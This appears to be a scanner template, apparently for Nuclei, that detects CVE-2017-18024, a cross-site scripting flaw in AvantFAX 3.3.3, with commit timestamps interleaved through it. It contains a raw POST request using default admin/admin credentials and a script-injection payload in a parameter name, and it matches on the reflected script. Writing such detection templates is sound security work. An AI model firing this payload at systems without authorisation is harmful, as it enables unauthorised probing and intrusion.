2021-08-05 05:48:55 +00:00
id : CVE-2017-18024
info :
name : AvantFAX 3.3.3 XSS
author : pikpikcu
severity : medium
reference : |
- https://hackerone.com/reports/963798
2021-08-05 15:10:16 +00:00
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
2021-08-05 05:48:55 +00:00
description : |
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
tags : cve,cve2017,xss,avantfax
requests :
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Content-Length : 44
2021-08-05 15:10:16 +00:00
username=admin&password=admin&_submit_check=1&jlbqg%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eb7g0x=1
2021-08-05 05:48:55 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-08-05 15:10:16 +00:00
- '</script><script>alert(document.domain)</script>'
2021-08-05 05:48:55 +00:00
part : body
- type : status
status :
- 200
- type : word
part : header
words :
- "text/html"